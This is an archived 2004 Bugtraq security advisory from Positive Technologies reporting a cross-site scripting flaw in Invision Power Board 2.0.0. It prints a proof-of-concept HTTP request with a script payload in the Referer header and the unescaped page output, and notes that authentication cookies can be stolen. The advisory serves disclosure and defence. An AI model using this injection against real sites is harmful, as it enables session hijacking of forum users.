[MAXPATROL Security Advisories] Cross site scripting in Invision Power Board

• Previous message: William Warren: "Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1950 - 4 msgs"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <bugtraq@Securityfocus.com>
Date: Tue, 5 Oct 2004 22:53:12 +0400

[MAXPATROL Security Advisories] Cross site scripting in Invision Power Board

Date: 5.10.2004

Severity: Low

Application: Invision Power Board v2.0.0

 Platform: PHP

 I. DESCRIPTION

An input validation vulnerability was found in Invision Power Board. A
remote user can conduct Cross site scripting attack.

1.
GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0

Referer: "'/><script>alert()</script>

Result

<...>
index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01"
method="post" name="LOGIN" onsubmit="return ValidateForm()">
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>"
/>
<...>

II. IMPACT

A remote user can access the target user's cookies (including authentication
cookies).

III. SOLUTION

 Not available currently.

IV. VENDOR FIX/RESPONSE
n/a
 

V. CREDIT

This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able
to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).

• Previous message: William Warren: "Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1950 - 4 msgs"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [Full-Disclosure] [MAXPATROL Security Advisories] Cross site scripting in Invision Power Board ... [MAXPATROL Security Advisories] ... Cross site scripting in Invision Power Board ... This vulnerability was discovered by Positive Technologies using MaxPatrol ... (Full-Disclosure) [MAXPATROL Security Advisories] Cross site scripting in Invision Power Board ... [MAXPATROL Security Advisories] ... Cross site scripting in Invision Power Board ... This vulnerability was discovered by Positive Technologies using MaxPatrol ... (Bugtraq) Multiple Vulnerabilities In Invision Power Board ... Invision Power Board is a professional forum system that ... versions of Invision Power Board are vulnerable to a serious ... SQL Injection vulnerability if magic_quotes_gpc is set to off. ... An attacker does not have to be logged in, ... (Bugtraq) [MaxPatrol] SQL-injection in Invision Power Board 2.x ... An input validation vulnerability was reported in Invision Power Board v2.x. ... A remote user may be able to execute arbitrary SQL commands on the underlying database. ... - intellectual professional security scanner. ... (Bugtraq) [Full-Disclosure] [SCSA-020] Multiple vulnerabilities in AttilaPHP ... Multiple vulnerabilities in AttilaPHP ... IMPACT: Cross Site Scripting ... This kind of attack known as "Cross-Site Scripting Vulnerability" ... You can fix the path disclosure problem by adding this code in ... (Full-Disclosure)